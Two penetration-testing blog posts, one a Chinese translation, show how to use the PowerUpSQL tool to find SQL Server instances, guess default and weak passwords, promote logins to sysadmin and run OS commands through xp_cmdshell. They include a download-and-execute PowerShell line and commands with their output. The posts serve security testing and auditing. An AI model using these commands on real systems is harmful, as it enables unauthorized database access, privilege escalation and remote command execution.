利用PowerUpSQL攻击SQL Server实例

2018-09-11阅读 4130  

这篇博客简述如何快速识别被第三方应用使用的SQL Server实例，该第三方软件用PowerUpSQL配置默认用户/密码配置。虽然我曾经多次提到过这一话题，但是我认为值得为这一主题写一篇简短的博客，帮助大家解决常见的问题。希望会帮助到那些尝试清理环境的渗透测试人员和网络安全团队。

测试方法总结

默认密码仍然是我们在内网渗透测试中碰到的最大的问题之一。Web应用尤其容易忽视这一问题，但是用自己的SQL Server实例布置的第三方应用还可以被浏览。Rob Fuller在PWNWiki建立一个默认SQL Server实例密码列表。我们也会追踪我们自己的列表，所以为了实现测试流程的自动化，我把他们放在一起，并用PowerShell把他们包裹起来。

这个高级进程是很简单的：

1. 创建一个列表，这个列表内容是应用程序特定的SQLServer实例名和与这个实例关联的默认用户名/密码；
2. 通过LDAP查询，扫描活动，或其他方式，识别SQL实例。
3. 用发现的实例名称交叉引用默认实例名称的列表。
4. 尝试登陆用关联的默认证书匹配的SQL Server实例。

加载PowerUpSQL

PowerUpSQL可以用很多不同的方式在PowerShell中加载。下面就是一个展示如何从GitHub中下载模块和导入模块的基本示例：

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

想要了解更多基础选项请看：https://github.com/NetSPI/PowerUpSQL/wiki/Setting-Up-PowerUpSQL.

同样，想要下载更多内容请看Matthew Green的博客：https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html.

命令例示：通过广播PING进行定位

您在加载PowerUpSQL之后，您可以通过运行下面的命令来发现在您当前广播域之内的SQL Server实例。

Get-SQLInstanceBroadcast -Verbose

如您所见，这个命令在你的本地网络为你提供一列SQL Server实例。为了分辨哪一个SQL实例用默认密码设置，您可以将“Get-SQLInstanceBroadcast”传递给“Get-SQLServerLoginDefaultPw”，正如下所示。

Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw –Verbose

命令示例：通过LDAP查询定位

如果你有域名证书，或已经在一个域名系统上运行，你也可以通过LDAP查询现用目录，为了一系列注册的SQLServer 通过如下命令。这也可以从一个非域系统通过使用来自PowerUpSQL Discovery Cheatsheet的语法执行。

Get-SQLInstanceDomain -Verbose

 正如最后一个例子所示,你只需要把“Get-SQLInstanceDomain”传送至“Get-SQLServerLoginDefaultPw” 就可以识别那些注册在默认密码设置的域中的SQL Server实例。

Get-SQLInstanceDomain -Verbose |Get-SQLServerLoginDefaultPw -Verbose

PowerUpSQL支持的SQLServer实例发现功能的完整列表已经被列在下面：

Function Name	Description
Get-SQLInstanceFile	Returns SQL Server instances from a file. One per line.
Get-SQLInstanceLocal	Returns SQL Server instances from the local system based on a registry search.
Get-SQLInstanceDomain	Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. The function will default to the current user’s domain and logon server, but an alternative domain controller can be provided. UDP scanning of management servers is optional.
Get-SQLInstanceScanUDP	Returns SQL Server instances from UDP scan results.
Get-SQLInstanceScanUDPThreaded	Returns SQL Server instances from UDP scan results and supports threading.
Get-SQLInstanceBroadcast	Returns SQL Server instances on the local network by sending a UDP request to the broadcast address of the subnet and parsing responses.

我还想指出，一个称为“Find-DbaInstance”的DBATools函数可以用于blind SQL Server实例发现。它实际上比PowerUpSQL提供更多的发现选项。Chrissy LeMaire已经写了一个很好的概述可以在https://dbatools.io/find-sql-instances/上找到。

Get-SQLServerLoginDefaultPw寻找什么？

通常Get-SQLServerLoginDefaultPw函数包含41个应用程序特定的默认SQL Server实例，用户和密码。我故意没有包含以SQL Express或MSSQLSERVER命名的实例，因为我想避开账户锁定。唯一一次登陆尝试是在这里有一个与应用程序部署匹配的实例。对于那些好奇的人来说，下面提供了应用程序特定实例的当前列表

ACS	CODEPAL	MYMOVIES	RTCLOCAL	vocollect
ACT7	CODEPAL08	ECC	SALESLOGIX	VSDOTNET
AOM2	CounterPoint	ECOPYDB	SIDEXIS_SQL
ARIS	CSSQL05	ECOPYDB	SQL2K5
AutodeskVault	CADSQL	Emerson2012	STANDARDDEV2014
BOSCHSQL	DHLEASYSHIP	HDPS	PCAMERICA
BPASERVER9	DPM	HPDSS	PRISM
CDRDICOM	DVTEL	INSERTGT	TEW_SQLEXPRESS
VSQL	EASYSHIP	INTRAVET	RMSQLDATA

总结

作为总结，确保你有仔细检查部署在你的环境中的第三方软件。希望这个文章/工具能够帮助安全团队清理那些与默认SQL Server实例关联的默认密码。

本文参与腾讯云自媒体分享计划，欢迎正在阅读的你也加入，一起分享。

 

Finding Weak Passwords for Domain SQL Servers on Scale using PowerUpSQL

  August 2, 2016 | Scott Sutherland TECHNICAL BLOGNETWORK PENETRATION TESTING  

In this blog, I’ll show how to use PowerUpSQL to quickly identify SQL logins configured with weak passwords on domain SQL Servers, using a standard domain account. We’ve used the techniques described below to obtain access to sensitive data and elevate privileges on SQL Servers. In many cases, the identified weak passwords also lead to domain privilege escalation via sysadmin access.

Hopefully this blog will be interesting to pentesters, red teamers, and administrators looking for another tool for auditing their SQL Servers for weak configurations.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog, so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.

1. Download PowerUpSQL.
   https://github.com/NetSPI/PowerUpSQL
 
2. Import the Module PS C:\> Import-Module PowerUpSQL.psd1
 
3. Get a list of accessible SQL Servers on the domain. PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
 
4. View accessible servers PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”} PS C:\> $Accessible   ComputerName Instance Status ------------ -------- ------ SQLServer1 SQLServer1\SQLEXPRESS Accessible SQLServer1 SQLServer1\STANDARDDEV2014 Accessible SQLServer1 SQLServer1 Accessible

Enumerating SQL Logins as a Domain User

By default, non-sysadmin logins in SQL Server don’t have privileges to select a list of SQL logins from the standard tables. However, functions exist in SQL Server that allow least privilege logins to do it anyways using basic fuzzing techniques. That means any user that can log into SQL Server can get a full user list. For the details check out this blog.

The PowerUpSQL “Invoke-SQLAuditWeakLoginPw” function can be used to automatically fuzz login names and attempt to identify weak passwords. By default, the function will only test the login as the password, and “password” as the password. So only two passwords will be attempted for each enumerated login. However, custom user and password lists can be provided.

At first glance this doesn’t seem like a big deal. However, in large environments this simple attack has been yielding hundreds of weak passwords on accessible SQL Servers using normal domain user accounts.

Identifying Weak SQL Server Passwords on Scale using PowerUpSQL

Below are a few examples showing how to use the “Invoke-SQLAuditWeakLoginPw” function with the accessible SQL Server list we obtained in the last section.

Note: All of the examples shown are run as the current Windows user, but alternative SQL Server login credentials can be provided.

PS C:\>; $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose   ComputerName : SQLServer1 Instance : SQLServer1\EXPRESS Vulnerability : Weak Login Password Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. Details : The testuser (Not Sysadmin) is configured with the password testuser. Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016   ComputerName : SQLServer1 Instance : SQLServer1\Express Vulnerability : Weak Login Password Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. Details : The testadmin (Sysadmin) is configured with the password testadmin. Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016

The function also supports automatically adding your current login to the sysadmin fixed server role if a sysadmin password is guessed by the script. Below is an example.

PS C:\> Invoke-SQLAuditWeakLoginPw –Verbose –Instance server\instance –Exploit   ..[snip]..   ComputerName : SQLServer1 Instance : SQLServer1\Express Vulnerability : Weak Login Password Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : Yes ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. Details : The testadmin (Sysadmin) is configured with the password testadmin. Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016   ..[snip]..

Or you could attempt to add yourself as a sysadmin on all accessible servers…

PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose –Exploit

Executing OS Commands on SQL Servers with PowerUpSQL

If you were able to escalate privileges using the commands from the previous section then you’re ready to execute OS commands on the SQL Server. The local and domain privileges you’ll have will vary depending on the SQL Server service account being used. It’s very common to see a single domain account being used to run a large portion of the SQL Servers in the environment. However, it’s also very common for SQL Servers to be configured to run as LocalSystem or a managed service account.

Below is the PowerUpSQL example showing how to execute OS commands on affected SQL Servers:

PS C:\> Invoke-SQLOSCmd –Verbose –Instance SQLServer1\Express –Command “dir c:\windows\system32\Drivers\etc” –RawResults   VERBOSE: Creating runspace pool and session states VERBOSE: SQLSERVER1\EXPRESS: Connection Success. VERBOSE: SQLSERVER1\EXPRESS: You are a sysadmin. VERBOSE: SQLSERVER1\EXPRESS: Show Advanced Options is already enabled. VERBOSE: SQLSERVER1\EXPRESS: xp_cmdshell is already enabled. VERBOSE: SQLSERVER1\EXPRESS: Running command: dir c:\windows\system32\Drivers\etc Volume in drive C is OSDisk Volume Serial Number is C044-F8BC Directory of c:\windows\system32\Drivers\etc 07/16/2016 08:42 PM <DIR> . 07/16/2016 08:42 PM <DIR> .. 09/22/2015 10:16 AM 851 hosts 08/22/2013 10:35 AM 3,683 lmhosts.sam 08/22/2013 08:25 AM 407 networks 08/22/2013 08:25 AM 1,358 protocol 08/22/2013 08:25 AM 17,463 services 5 File(s) 23,762 bytes 2 Dir(s) 142,140,887,040 bytes free VERBOSE: Closing the runspace pool

Or if you would like to run commands on multiple servers you can use the example below.

PS C:\>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10   ComputerName Instance CommandResults ------------ -------- -------------- SQLServer1 SQLServer1\SQLEXPRESS nt service\mssql$sqlexpress SQLServer1 SQLServer1\STANDARDDEV2014 nt authority\system SQLServer1 SQLServer1 Domain\SQLSvc

Wrap Up

In this blog, I provided an overview of how to use the PowerUpSQL function “Invoke-SQLAuditWeakLoginPw” to quickly identify SQL Server logins configured with weak passwords on ADS domains. While the function doesn’t offer any new techniques, it does provide more automation than the scripts I’ve provided in the past. As a result, it has potential to provide unauthorized data access and additional domain privileges in most large environments. It’s also worth noting that the “Invoke-SQLEscalatePriv” function attempts to exploit this issue along with others when it’s run.

Good luck and hack responsibility!